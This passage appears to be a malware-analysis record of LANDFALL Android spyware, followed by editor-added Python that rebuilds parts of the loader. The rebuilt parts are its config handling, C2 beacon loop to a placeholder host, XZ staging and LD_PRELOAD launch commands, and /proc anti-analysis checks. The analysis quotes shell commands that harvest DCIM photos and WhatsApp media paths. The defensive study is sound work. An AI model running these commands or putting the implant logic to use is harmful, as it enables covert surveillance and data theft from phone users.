One path is for the staged download and one is for the final l.so used for execution.\r\nConfiguration\r\nLANDFALL reads and XOR-decrypts a JSON configuration directly from its own file. The spyware normalizes\r\nconfiguration by writing internal defaults back into the parsed object: numeric fields default when missing or zero,\r\nand certain booleans are coerced to fixed values regardless of the supplied configuration. Finally, it checks that a\r\npublic key (X.509 DER) is present in the configuration and exits otherwise.\r\nTable 8 summarizes the configuration normalization performed at this stage.\r\nKey name | Value type | Default | Required\r\nallow_wifi | boolean | Enforced true (overrides false/missing to true) | No\r\nallow_mobile | boolean | Enforced true (overrides false/missing to true) | No\r\nallow_roaming | boolean | Default false if missing/false; true remains true | No\r\nallow_min_battery | integer | 0 if value is 0 or missing | No\r\nsleep_time | integer (seconds) | 60 if value is 0 or missing | No\r\nsleep_time_between_retries | integer (seconds) | 35 if value is 0 or missing | No\r\nsuicide_time | integer (seconds) | 7200 if value is 0 or missing | No\r\nlive_mode_expiration | integer (seconds) | 0 if value is 0 or missing | No\r\nsocket_timeout | integer (seconds) | 5 if value is 0 or missing | No\r\nis_persistent | boolean | Default false if missing/false; true remains true | No\r\nbridge_head_version_major | integer | Hard-set to 2 (always) | No\r\nbridge_head_version_minor | integer | Hard-set to 1 (always) | No\r\ncnc_hostname | string | None; must be present | Yes\r\ncnc_port | integer | None; must be non-zero | Yes\r\ncnc_base_url | string | None; must be present | Yes\r\nagent_id | string (UUID) | None; must be present | Yes\r\ncommand_id | string (UUID) | None; must be present | Yes\r\ncommands | array | Must exist; read and freed (structure not retained here) | Yes\r\npublic_key | X.509 DER (bytes) | None; must be present and valid | Yes\r\nTable 8. Keys and values for LANDFALL malware.\r\nCommunication With the C2 Server\r\nOnce configuration is complete, b.so loads the necessary network and encryption functions, sets up its SSL\r\nenvironment, and prepares a secure client context for future HTTPS communication. If any part of this setup fails,\r\nit exits cleanly rather than risk a partial setup.\r\nBefore entering the C2 beaconing loop, it optionally emits telemetry. If it is running as root, it formats a concise\r\n\"started\" line that includes:\r\nA fixed version marker (e.g., v1.5.0)\r\npid\r\neuid\r\nRunner mode\r\nIt then sends that via a POST request to the C2 server (shown as an image in the original post).\r\nIf the runner mode is I, it prepares the SELinux helper first: it locates the compressed policy helper\r\n(/data/data/com.samsung.ipservice/files/l), inflates it via an internal XZ decoder into a fresh buffer, and writes the\r\nresult to /data/data/com.samsung.ipservice/files/l.so. Then it beacons to the C2 server by sending a ping using the\r\nhyphen‑stripped agent_id as payload. The outcome does not gate the rest of the flow; it serves as operator\r\ntelemetry.\r\nAn example of the code for an I‑mode ping appears as an image in the original post.\r\nOnly then does the main C2 beaconing loop begin. It records time zero and enforces a strict wall‑clock budget of\r\nabout 7,200 seconds (suicide_time) for the entire session.\r\nIt zeros two large, reusable path buffers: one for the raw blob that may arrive from the server, and a sibling for the\r\ndecompressed shared object. Both paths live under the app‑private working directory (e.g.,\r\n/data/data/com.samsung.ipservice/files/). 
With the paths ready, it contacts the command and control server by\r\nbuilding a compact, URL‑encoded-style body of key=value pairs:\r\nA protocol/variant tag; the beacon message type\r\nThe agent_id, command_id and a fresh upload_id (UUIDv4) for correlation\r\nsource=bridge_head\r\neuid\r\nThe runner flag and its on‑disk install path\r\nWhen applicable, it computes a SHA-1 over part of the message and appends it. It uses the following Chrome\r\nUser‑Agent string:\r\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/44.0.2403.89 Safari/537.36\r\nThat desktop Chrome 44 string is an anachronism coming from an Android handset, which makes it a usable\r\nnetwork-detection anchor on its own.\r\nRequests are directed at the configured base path (e.g., POST /is/ HTTP/1.0). Before any application data is sent,\r\nit pins the TLS connection.\r\nWhile reading the response from the C2 server, LANDFALL checks the response status code and looks through\r\nthe headers to determine the message length and type. Some status codes — particularly timeouts and a masked\r\nset of 4xx/5xx (e.g., 408, 504) — are treated as transient and trigger sleep(sleep_time_between_retries) (default 35\r\nseconds) before retrying with a fresh connection. A not‑found response (e.g., 404) is considered terminal for this\r\nrun and exits the loop. If the status indicates success and a body is present, LANDFALL proceeds to staging.\r\nNext-Stage Payloads\r\nStaging starts by cleaning up the file system state. If an old raw blob exists at the temporary path, it removes it. 
It\r\nwrites the raw bytes to a staging file named aa.so under the working directory, and then attempts to decompress\r\nthem using a built‑in XZ/LZMA decoder that inflates into a pre‑allocated buffer of approximately 5 MiB.\r\nOn success, it writes the decompressed bytes to dec_a.so (the final .so path) under the working directory, clears\r\nthe temporary aa.so and sets the file mode on dec_a.so to 777 to ensure it’s loadable in various contexts. For\r\ndefenders, a world-writable dec_a.so under that directory and an id process started with LD_PRELOAD pointing at it\r\nare the most direct on-disk and process-lineage artifacts of this stage.\r\nExample XZ inflater (trimmed):\r\nWith the shared object in place (dec_a.so), it chooses an execution strategy based on the runner flag. For\r\ninteractive setups (I), it exports two environment variables and launches a benign system tool synchronously:\r\nLD_PRELOAD=\u003cfinal.so\u003e PRELOAD_PATH=/data/data/com.samsung.ipservice/files/l.so /system/bin/id\r\n(where \u003cfinal.so\u003e is dec_a.so)\r\nThe PRELOAD_PATH points at the device path where SELinux policy content is expected, allowing the\r\npreloaded code to find and apply policy at startup. Note that this PRELOAD_PATH is only used in interactive\r\nmode; the passive path omits it.\r\nFor passive runs (P), it launches the same tool in the background:\r\nLD_PRELOAD=\u003cfinal.so\u003e /system/bin/id (where \u003cfinal.so\u003e is dec_a.so)\r\nThis is done so control returns quickly while the helper initializes in another process. Internally, both are\r\ndispatched via a shell wrapper (/system/bin/sh -c \u003ccmd\u003e). In both cases, it accepts only narrow success results:\r\nexit code 0 or a specific 0x15; anything else is treated as failure and breaks out of the loop.\r\nOn successful load, it formats and sends an “ended” line mirroring the opening message including:\r\nVersion marker\r\npid\r\nincremental_build\r\nrunner\r\nIt then frees transient strings and buffers. 
If no payload was available, or if a transient error occurred, it checks the\r\nelapsed wall‑clock time against its approximately 7,200‑second budget. If there’s time left, it sleeps the configured\r\ninterval and tries again.\r\nFinally, when the loop finishes, either after successfully loading the next stage or because the time budget ran out or\r\nan unrecoverable error occurred, it unwinds cleanly. If it is running as root, it prefers a direct _exit(status) path instead of a\r\nnormal return to minimize side effects in the runtime. In all cases, it aims to leave behind only the minimum\r\nartifacts needed for the staged code to continue.\r\nUnreferenced Capabilities\r\nDuring reverse engineering, we identified multiple routines compiled into the b.so component that are not invoked\r\nby its observed control flow. These latent features appear designed for use by the follow‑on modules loaded after it.\r\nIt is also very probable that some of these functions are leftovers from older versions of LANDFALL. They reveal\r\nconcrete behaviors oriented around WhatsApp media paths, DCIM discovery, file system staging and process\r\nhygiene on Android:\r\nOne routine prepares a “started” telemetry line and then interacts with the device’s media subsystem. It\r\nformats the line (with the pid, euid and runner values filled in at run time):\r\nBH v1.5.0 started - pid: , euid=, incremental_build: v1.5.0, runner:\r\nIf its internal checks pass, it executes a broadcast to force a gallery rescan using the exact shell command:\r\nam broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d\r\nfile:///sdcard/DCIM/hacked.jpg\r\nIn the same flow, it also constructs a “newest photo” probe over DCIM using:\r\nfind /sdcard/DCIM -type f -exec ls -t1 {} + | grep -v hacked| head -1\r\nThis pattern is consistent with harvesting the latest camera item while excluding an artifact it can\r\nplant. This routine is compiled in but not called by any other code in the sample.\r\nWhatsApp media path planter. 
Another routine decodes a hard-coded Base64 1x1 PNG\r\n(iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJ…JRU5ErkJggg==) and searches\r\nWhatsApp’s media directories on external storage for a recent file path that matches the agent’s identifier\r\n(the UUID is first stripped of hyphens). It builds and executes a search pipeline across both default (ID 0)\r\nand multi‑user (ID 95) paths:\r\nfind /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/Media/WhatsApp\\ Images/\r\n/storage/emulated/95/Android/media/com.whatsapp/WhatsApp/Media/WhatsApp\\ Images/ -type f\r\n-atime -720m -maxdepth 1 -exec grep -lo '.*\u003cagentIdNoHyphens\u003e.*' {} \\; -quit 2\u003e/dev/null\r\nIf such a path is returned, it writes the decoded PNG there verbatim. This looks like a cover‑artifact\r\nor covert marker stage aimed at WhatsApp images.\r\nAnother helper takes a base directory and a string and returns one matching JPEG path by executing:\r\nfind \u003cbase\u003e -name '*.jpg' -exec grep -le '.*\u003cpattern\u003e.*' {} \\;\r\nIt trims trailing newlines and verifies the path exists before returning.\r\nZygote avoidance check: A process‑hygiene helper allocates a buffer for its own cmdline and returns\r\nsuccess only when the name does not match zygote or zygote64. It is designed to avoid Android’s special\r\nhost processes.\r\nSELinux symbol resolver and cleanup: Two small routines handle dynamic SELinux plumbing.\r\nOne dlopens /system/lib64/libselinux.so and resolves getfilecon and setfilecon into global function\r\npointers.\r\nThe other tears this down and clears the pointers.\r\nBoth exist to support policy/file‑context work but are not referenced by the observed code path.\r\nA more substantial routine accepts a list of file system paths. 
For each, it saves the current label via\r\ngetfilecon, invokes an internal labeler on the path, applies ownership via chown and then restores the saved\r\nlabel with setfilecon. It returns distinct negative codes when chown or setfilecon fail.\r\nThere is a file probe that attempts to open a path and maps the outcome to internal status codes (success,\r\npermission denied, not found, generic error). It also resets internal library state (including any previously\r\nopened SELinux handles).\r\nMap process‑execution outcome to message status: A tiny mapper converts the result of an internal\r\ncommand‑execution helper into message catalog codes (e.g., mapping a specific return (1) to\r\nCMD_STAT_* code 0x0C and 2–3 to 0x51). It standardizes reporting for helpers but is not reached by the\r\ncurrent logic.\r\nBuilding a device‑report JSON array: Another dormant routine constructs a cJSON array where each entry\r\ncarries device_path, a Base64‑encoded binary field, a last_updated boolean and a textual state derived from\r\nthe internal CMD_STAT_* table. 
It walks an input vector, reads the referenced file into memory, Base64\r\nencodes it and appends to the array.\r\nA small string‑templating helper finds occurrences of the token --working_dir-- inside a JSON value and\r\nreplaces them with the runtime path tracked by the b.so.\r\nAppending TracerPid to telemetry: A diagnostic helper parses /proc/self/status, extracts the TracerPid line,\r\nconverts it to an integer, and, if greater than zero, appends a formatted key/value into the request body via\r\nthe b.so’s string‑builder. A non-zero TracerPid means another process is ptrace-attached (a debugger or similar\r\ntracer), so this doubles as an analysis-environment check that is reported to the operator.\r\nA staging helper concatenates an existing buffer with a pseudo‑random block derived from an input string:\r\nIt seeds a byte with rand()\r\nIt XORs each subsequent byte of the input into a rolling accumulator\r\nIt writes the accumulator bytes as a suffix\r\nIt then writes the combined buffer to a given file path via the b.so’s writer\r\nA two‑step installer/uninstaller pair uses three config keys: persistency_origin, persistency_payload and\r\npersistency_backup. The main routine checks that all three are set, copies the backup back to the origin if\r\nneeded and then deletes the payload file. It returns distinct status codes (0x4B/0x4C/0x4D) that map to the\r\nmessage catalog entries for “no config,” “failed move” and “failed unlink.” A sibling routine conditionally\r\ncreates or truncates the backup file (fopen with mode “w”) when a global persistence flag is set.\r\nBattery percentage via sysfs: A utility reads battery capacity from the system’s power‑supply sysfs,\r\nchecking two common locations: /sys/class/power_supply/battery/capacity and\r\n/sys/class/power_supply/Battery/capacity.\r\nTwo routines set up and finalize the working directory under app‑private storage.\r\nThe first creates the directory tree, applies mode 0771 (0x1F9), temporarily adds execute to the\r\nparent and copies the resolved path into config. 
And, when running as root, it attempts to mount a\r\ntmpfs at that location to keep artifacts in memory. A tmpfs there means the staged files do not survive a reboot\r\nand will not appear in a dead-box image; on a live device, check /proc/mounts for that path.\r\nThe second (cleanup/finalize) can, when root and the directory exists, run lsof | grep \u003cworking_dir\u003e\r\nand ship the result home. It then restores the parent directory’s original mode and frees the path\r\nbuffer.\r\nProcess discovery by SELinux context and by cmdline: Two search helpers iterate /proc, building and\r\nreading per‑PID files.\r\nOne compares /proc/%d/attr/current against a target SELinux context and then confirms the process\r\nhas PPID 1.\r\nThe other compares /proc/%d/cmdline against a target cmdline.\r\nOn a match, they write the PID to an out‑parameter and return success.\r\nDebug‑printing a variant array: A developer‑facing routine prints a small typed array structure. It formats\r\ntype names from a table, dumps short byte arrays inside square brackets and emits a single character for a\r\nspecific type, one element per line. This looks like leftover debugging and is not invoked by active code.\r\nNone of these helpers are exercised by this component’s main execution loop. Their presence is consistent with a\r\nstaged architecture in which subsequently loaded shared objects, forming the complete LANDFALL framework,\r\nexpand collection and persistence using capabilities already compiled into this loader.\r\nSource: https://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/"
	],
	"report_names": [
		"landfall-is-new-commercial-grade-android-spyware"
	],
	"threat_actors": [
		{
			"id": "0f47a6f3-a181-4e15-9261-50eef5f03a3a",
			"created_at": "2022-10-25T16:07:24.228663Z",
			"updated_at": "2026-04-10T02:00:04.905195Z",
			"deleted_at": null,
			"main_name": "Stealth Falcon",
			"aliases": [
				"FruityArmor",
				"G0038",
				"Project Raven",
				"Stealth Falcon"
			],
			"source_name": "ETDA:Stealth Falcon",
			"tools": [
				"Deadglyph",
				"StealthFalcon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "77aedfa3-e52b-4168-8269-55ccec0946f7",
			"created_at": "2023-01-06T13:46:38.453791Z",
			"updated_at": "2026-04-10T02:00:02.981559Z",
			"deleted_at": null,
			"main_name": "Stealth Falcon",
			"aliases": [
				"FruityArmor",
				"G0038"
			],
			"source_name": "MISPGALAXY:Stealth Falcon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bd084d2f-4233-49b1-b0e6-c7011178dae0",
			"created_at": "2022-10-25T15:50:23.544316Z",
			"updated_at": "2026-04-10T02:00:05.325921Z",
			"deleted_at": null,
			"main_name": "Stealth Falcon",
			"aliases": [
				"Stealth Falcon"
			],
			"source_name": "MITRE:Stealth Falcon",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b8c7c542-43ed-498c-af6b-b4b5f0c75724",
			"created_at": "2024-02-02T02:00:04.026045Z",
			"updated_at": "2026-04-10T02:00:03.529714Z",
			"deleted_at": null,
			"main_name": "Carmine Tsunami",
			"aliases": [
				"DEV-0196",
				"QuaDream"
			],
			"source_name": "MISPGALAXY:Carmine Tsunami",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434723,
	"ts_updated_at": 1775791846,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/864f9d59af4b4b84b8ed7675fe8dd02a4ddd42a6.pdf",
		"text": "https://archive.orkl.eu/864f9d59af4b4b84b8ed7675fe8dd02a4ddd42a6.txt",
		"img": "https://archive.orkl.eu/864f9d59af4b4b84b8ed7675fe8dd02a4ddd42a6.jpg"
	}
}
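The configuration normalization that Appendix B's Table 8 describes, written out as an added Python example. This is editor-added code, not Unit 42's and not code from the LANDFALL sample: it applies the table's defaults, forced booleans, hard-set version fields and required-key checks to a parsed JSON object and rejects configurations the loader would exit on. The report does not give the XOR key the binary uses, so xor_decrypt takes the key as a parameter and SAMPLE_KEY is a constructed placeholder; the DER check is a tag test standing in for the loader's real parser, and every value in SAMPLE_CONFIG is constructed.

```python
"""Table 8 normalization rebuilt for analysis (editor-added; not the sample's code)."""
import json

# Integers that fall back to a default when the key is missing or 0 (Table 8).
_ZERO_DEFAULTS = {
    "allow_min_battery": 0,
    "sleep_time": 60,
    "sleep_time_between_retries": 35,
    "suicide_time": 7200,
    "live_mode_expiration": 0,
    "socket_timeout": 5,
}
_FORCED_TRUE = ("allow_wifi", "allow_mobile")        # forced to true whatever was supplied
_DEFAULT_FALSE = ("allow_roaming", "is_persistent")  # false when missing, true stays true
_REQUIRED = ("cnc_hostname", "cnc_base_url", "agent_id", "command_id", "commands")


def xor_decrypt(blob: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. The real key is not in the report (assumption)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))


def normalize_config(cfg: dict) -> dict:
    """Return a copy of cfg with Table 8's defaults written back in.

    Raises ValueError wherever the loader would exit: a missing required key,
    a zero cnc_port, or an absent/malformed public_key.
    """
    out = dict(cfg)
    for k in _FORCED_TRUE:
        out[k] = True
    for k in _DEFAULT_FALSE:
        out[k] = bool(out.get(k, False))
    for k, default in _ZERO_DEFAULTS.items():
        if not out.get(k):                 # missing, None or 0 -> default
            out[k] = default
    out["bridge_head_version_major"] = 2   # hard-set, never taken from the file
    out["bridge_head_version_minor"] = 1
    for k in _REQUIRED:
        if k not in out or out[k] in (None, ""):
            raise ValueError(f"required key missing: {k}")
    if not out.get("cnc_port"):
        raise ValueError("cnc_port must be non-zero")
    # X.509 DER (certificate or SubjectPublicKeyInfo) always opens with a
    # SEQUENCE tag, 0x30. Tag check only; stands in for the real parser.
    pk = out.get("public_key")
    if not isinstance(pk, (bytes, bytearray)) or len(pk) < 2 or pk[0] != 0x30:
        raise ValueError("public_key absent or not DER")
    out["public_key"] = bytes(pk)
    # "commands" is only required to exist; the loader reads and frees it.
    return out


def is_rejected(cfg: dict) -> bool:
    """True when normalize_config would make the loader exit."""
    try:
        normalize_config(cfg)
    except ValueError:
        return True
    return False


def load_config(encrypted: bytes, key: bytes) -> dict:
    """Decrypt, parse and normalize an embedded configuration blob."""
    cfg = json.loads(xor_decrypt(encrypted, key))
    if isinstance(cfg.get("public_key"), str):      # hex-encoded in our sample
        cfg["public_key"] = bytes.fromhex(cfg["public_key"])
    return normalize_config(cfg)


# Constructed sample config: gaps left for the loader to fill, a false allow_wifi
# to be overridden, and a placeholder DER SEQUENCE (not a real key).
SAMPLE_KEY = b"\x5a"   # placeholder XOR key (assumption)
SAMPLE_CONFIG = {
    "allow_wifi": False, "sleep_time": 0, "is_persistent": True,
    "cnc_hostname": "c2.invalid", "cnc_port": 443, "cnc_base_url": "/is/",
    "agent_id": "123e4567-e89b-42d3-a456-426614174000",
    "command_id": "123e4567-e89b-42d3-a456-426614174001",
    "commands": [], "public_key": "3003020100",
}
SAMPLE_BLOB = xor_decrypt(json.dumps(SAMPLE_CONFIG).encode(), SAMPLE_KEY)

if __name__ == "__main__":
    shown = {k: v for k, v in load_config(SAMPLE_BLOB, SAMPLE_KEY).items() if k != "public_key"}
    print(json.dumps(shown, indent=1))
```

Feeding a config carved from a sample through load_config with the recovered key shows exactly which knobs an operator set and which the loader overrode; the forced allow_wifi/allow_mobile values, for instance, mean no operator configuration can keep the implant off Wi-Fi or mobile data.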
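The C2 poll from the Communication With the C2 Server section of Appendix B, modelled as an added Python example (editor-added, not Unit 42's code and not the sample's). It builds the key=value body with a trailing SHA-1, wraps it in the HTTP/1.0 POST with the Chrome/44 User-Agent the report quotes, sorts responses into transient (sleep sleep_time_between_retries, fresh connection), terminal (404) and stage, and enforces the suicide_time session budget. The report gives neither the exact key names, nor which part of the message the SHA-1 covers, nor the full masked status set, so those parts are assumptions; the scripted transport, virtual clock and SAMPLE_CFG are test scaffolding with constructed values, and TLS pinning is not modelled.

```python
"""Bridge-head beacon loop as described in Appendix B (editor-added model)."""
import hashlib
import urllib.parse
import uuid
from typing import Callable, List, Optional, Tuple

USER_AGENT = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36")
TRANSIENT = {408, 504}      # codes the report names; the real mask is wider (assumption)
TERMINAL = {404}
Response = Tuple[Optional[int], bytes]   # (status, body); status None models a timeout


def build_beacon_body(agent_id: str, command_id: str, euid: int, runner: str,
                      install_path: str, msg_type: str = "poll") -> str:
    """URL-encoded key=value body with the field set the report lists.
    Key names are assumed; the SHA-1 here covers the preceding pairs."""
    fields = [("variant", "bh"), ("type", msg_type), ("agent_id", agent_id),
              ("command_id", command_id), ("upload_id", str(uuid.uuid4())),
              ("source", "bridge_head"), ("euid", str(euid)), ("runner", runner),
              ("path", install_path)]
    body = urllib.parse.urlencode(fields)
    return body + "&sha1=" + hashlib.sha1(body.encode()).hexdigest()


def verify_beacon_body(body: str) -> bool:
    """Server-side (or analyst) check of the trailing digest."""
    head, sep, digest = body.rpartition("&sha1=")
    return bool(sep) and hashlib.sha1(head.encode()).hexdigest() == digest


def build_request(host: str, base_url: str, body: str) -> bytes:
    """Raw HTTP/1.0 POST as sent inside the pinned TLS session (pinning not modelled)."""
    head = (f"POST {base_url} HTTP/1.0\r\nHost: {host}\r\nUser-Agent: {USER_AGENT}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n")
    return head.encode() + body.encode()


def classify(status: Optional[int], body: bytes) -> str:
    if status is None or status in TRANSIENT:
        return "transient"     # sleep(sleep_time_between_retries), then a fresh connection
    if status in TERMINAL:
        return "terminal"      # 404: leave the loop for this run
    if 200 <= status < 300:
        return "stage" if body else "idle"   # idle: sleep(sleep_time), poll again
    return "terminal"          # other errors are not specified in the report; assumed terminal


def beacon_session(cfg: dict, transport: Callable[[bytes], Response],
                   now: Callable[[], float], sleep: Callable[[float], None]
                   ) -> Tuple[str, Optional[bytes], List[str]]:
    """Poll until a payload arrives, a terminal status is seen or suicide_time elapses."""
    t0 = now()
    decisions: List[str] = []
    while now() - t0 < cfg["suicide_time"]:
        body = build_beacon_body(cfg["agent_id"], cfg["command_id"], cfg["euid"],
                                 cfg["runner"], cfg["install_path"])
        status, payload = transport(build_request(cfg["cnc_hostname"], cfg["cnc_base_url"], body))
        kind = classify(status, payload)
        decisions.append(kind)
        if kind == "stage":
            return "staged", payload, decisions
        if kind == "terminal":
            return "terminal", None, decisions
        sleep(cfg["sleep_time_between_retries"] if kind == "transient" else cfg["sleep_time"])
    return "budget_exhausted", None, decisions


class FakeClock:
    """Virtual clock: sleeping advances time without waiting (test scaffolding)."""
    def __init__(self) -> None:
        self.t = 0.0

    def now(self) -> float:
        return self.t

    def sleep(self, seconds: float) -> None:
        self.t += seconds


def scripted_transport(responses: List[Response]) -> Callable[[bytes], Response]:
    """Replay constructed responses in order; the last one repeats forever."""
    queue = list(responses)

    def send(_request: bytes) -> Response:
        return queue.pop(0) if len(queue) > 1 else queue[0]
    return send


SAMPLE_CFG = {   # constructed values in the shape Table 8 describes
    "cnc_hostname": "c2.invalid", "cnc_base_url": "/is/",
    "agent_id": "123e4567-e89b-42d3-a456-426614174000",
    "command_id": "123e4567-e89b-42d3-a456-426614174001",
    "euid": 0, "runner": "I",
    "install_path": "/data/data/com.samsung.ipservice/files/b.so",
    "sleep_time": 60, "sleep_time_between_retries": 35, "suicide_time": 7200,
}

if __name__ == "__main__":
    clock = FakeClock()
    outcome, payload, kinds = beacon_session(
        SAMPLE_CFG,
        scripted_transport([(408, b""), (None, b""), (200, b""), (200, b"\xfd7zXZ\x00")]),
        clock.now, clock.sleep)
    print(outcome, kinds, "virtual seconds elapsed:", clock.t)
```

The injected clock makes the budget arithmetic visible: with the defaults an idle server is polled 120 times over 7,200 virtual seconds and the session then ends on its own, which is the traffic cadence (one POST per minute, Chrome 44 UA, HTTP/1.0) to look for in proxy logs.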
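The staging step from Next-Stage Payloads in Appendix B, rebuilt as an added Python example (editor-added; not Unit 42's code and not the sample's). inflate_bounded behaves like a loader that can only inflate into a fixed buffer of about 5 MiB and treats anything oversized, truncated or not XZ/LZMA as no payload; stage_payload reproduces the aa.so to dec_a.so handoff with the mode-777 chmod; launch_command renders the LD_PRELOAD command line for each runner flag. The same inflater will re-inflate an l or aa.so blob pulled from a device for analysis. The work directory is a temporary directory here, the .so content is a constructed stand-in, and the shell is never actually invoked.

```python
"""Staging and launch of dec_a.so as described in Appendix B (editor-added)."""
import lzma
import os
import shlex
import tempfile
from typing import Optional

STAGE_BUFFER = 5 * 1024 * 1024       # the "approximately 5 MiB" pre-allocated buffer
ACCEPTED_EXIT_CODES = {0, 0x15}      # the only results the sample treats as success
LANDFALL_WORKDIR = "/data/data/com.samsung.ipservice/files/"


def inflate_bounded(blob: bytes, limit: int = STAGE_BUFFER) -> bytes:
    """Inflate an XZ/LZMA stream into at most `limit` bytes.

    Returns b"" for input that is not XZ/LZMA, is truncated, or would not fit:
    with a fixed output buffer a partial result is unusable, so oversize is a
    hard failure (and a cheap guard against decompression bombs).
    """
    dec = lzma.LZMADecompressor(format=lzma.FORMAT_AUTO)
    try:
        # Ask for one byte more than the buffer holds; getting it proves overflow.
        out = dec.decompress(blob, max_length=limit + 1)
    except lzma.LZMAError:
        return b""
    if len(out) > limit or not dec.eof:  # oversized, or the stream never finished
        return b""
    return out


def xz_compress(data: bytes) -> bytes:
    """Helper for producing test blobs in the format the loader expects."""
    return lzma.compress(data, format=lzma.FORMAT_XZ)


def stage_payload(raw: bytes, workdir: str) -> Optional[str]:
    """Write raw to aa.so, inflate to dec_a.so, drop aa.so, chmod 777; None on failure."""
    tmp = os.path.join(workdir, "aa.so")
    final = os.path.join(workdir, "dec_a.so")
    if os.path.exists(tmp):              # leftover raw blob from an earlier round
        os.remove(tmp)
    with open(tmp, "wb") as f:
        f.write(raw)
    so = inflate_bounded(raw)
    if not so:
        return None                      # the loader treats this round as a failure
    with open(final, "wb") as f:
        f.write(so)
    os.remove(tmp)
    os.chmod(final, 0o777)               # world rwx, exactly as the sample sets it
    return final


def launch_command(runner: str, final_so: str, workdir: str = LANDFALL_WORKDIR) -> str:
    """The command the sample hands to /system/bin/sh -c for each runner flag."""
    preload = f"LD_PRELOAD={shlex.quote(final_so)}"
    if runner == "I":      # interactive: synchronous, with the SELinux helper path
        helper = shlex.quote(os.path.join(workdir, "l.so"))
        return f"{preload} PRELOAD_PATH={helper} /system/bin/id"
    if runner == "P":      # passive: backgrounded, no PRELOAD_PATH
        return f"{preload} /system/bin/id &"
    raise ValueError(f"unknown runner flag {runner!r}")


def exit_accepted(code: int) -> bool:
    return code in ACCEPTED_EXIT_CODES


def demo() -> dict:
    """Stage a constructed blob into a temp dir and report what is left behind."""
    workdir = tempfile.mkdtemp()
    fake_so = b"\x7fELF" + bytes(range(256)) * 64       # stand-in, not a real .so
    staged = stage_payload(xz_compress(fake_so), workdir)
    return {
        "staged": staged,
        "mode": oct(os.stat(staged).st_mode & 0o777) if staged else None,
        "aa_removed": not os.path.exists(os.path.join(workdir, "aa.so")),
        "cmd_I": launch_command("I", staged or "dec_a.so"),
        "cmd_P": launch_command("P", staged or "dec_a.so"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On a device image, a dec_a.so with mode 777 next to an l.so in that directory is the end state of this routine; an aa.so still present means staging failed mid-way or was interrupted.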
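Several of the unreferenced helpers listed in Appendix B (process discovery by SELinux context with the PPID 1 check, discovery by cmdline, the zygote avoidance check, the TracerPid telemetry and the sysfs battery read) as an added Python example, run against a constructed /proc and /sys tree so it works off-device. This is editor-added code, not Unit 42's and not the sample's; the tracer_pid key name in telemetry_suffix is assumed, every process in build_fake_root is made up, and pointing proc_root at a real /proc on a rooted test device is the intended use.

```python
"""/proc and sysfs helpers mirroring Appendix B's dormant routines (editor-added)."""
import os
import tempfile
from typing import Dict, List, Optional, Tuple


def _read(path: str) -> str:
    """Best-effort read; a vanished or unreadable /proc entry reads as empty."""
    try:
        with open(path, "rb") as f:
            return f.read().decode("utf-8", "replace")
    except OSError:
        return ""


def _status_field(proc_root: str, pid, field: str) -> Optional[int]:
    for line in _read(os.path.join(proc_root, str(pid), "status")).splitlines():
        if line.startswith(field + ":"):
            return int(line.split()[1])
    return None


def _pids(proc_root: str) -> List[int]:
    return sorted(int(n) for n in os.listdir(proc_root) if n.isdigit())


def find_pid_by_context(proc_root: str, target_ctx: str) -> Optional[int]:
    """/proc/<pid>/attr/current equals target and PPID is 1 (spawned by init)."""
    for pid in _pids(proc_root):
        ctx = _read(os.path.join(proc_root, str(pid), "attr", "current")).rstrip("\x00\n")
        if ctx == target_ctx and _status_field(proc_root, pid, "PPid") == 1:
            return pid
    return None


def find_pid_by_cmdline(proc_root: str, target: str) -> Optional[int]:
    """/proc/<pid>/cmdline is NUL-separated argv; match on argv[0]."""
    for pid in _pids(proc_root):
        argv = _read(os.path.join(proc_root, str(pid), "cmdline")).split("\x00")
        if argv[0] == target:
            return pid
    return None


def not_zygote(proc_root: str, pid="self") -> bool:
    """The process-hygiene check: refuse to operate inside zygote/zygote64."""
    name = _read(os.path.join(proc_root, str(pid), "cmdline")).split("\x00")[0]
    return os.path.basename(name) not in ("zygote", "zygote64")


def tracer_pid(proc_root: str, pid="self") -> int:
    """TracerPid from /proc/<pid>/status; non-zero means a ptrace tracer is attached."""
    return _status_field(proc_root, pid, "TracerPid") or 0


def telemetry_suffix(proc_root: str, pid="self") -> str:
    """What the diagnostic helper appends to the request body (key name assumed)."""
    t = tracer_pid(proc_root, pid)
    return f"&tracer_pid={t}" if t > 0 else ""


def battery_percent(sys_root: str) -> Optional[int]:
    """Battery capacity from either sysfs spelling the sample probes."""
    for name in ("battery", "Battery"):
        txt = _read(os.path.join(sys_root, "class", "power_supply", name, "capacity")).strip()
        if txt.isdigit():
            return int(txt)
    return None


def _write(path: str, text: str) -> None:
    with open(path, "w") as f:
        f.write(text)


def build_fake_root() -> str:
    """Constructed /proc and /sys tree (sample data, not from a real device)."""
    root = tempfile.mkdtemp()
    procs: Dict[int, Tuple[str, int, str, int]] = {   # pid: (context, ppid, argv0, tracer)
        1:   ("u:r:init:s0",       0,   "/init",                 0),
        400: ("u:r:zygote:s0",     1,   "zygote64",              0),
        812: ("u:r:system_app:s0", 1,   "com.samsung.ipservice", 0),
        813: ("u:r:system_app:s0", 812, "com.samsung.ipservice", 7),  # child, being traced
    }
    for pid, (ctx, ppid, argv0, tracer) in procs.items():
        d = os.path.join(root, "proc", str(pid))
        os.makedirs(os.path.join(d, "attr"))
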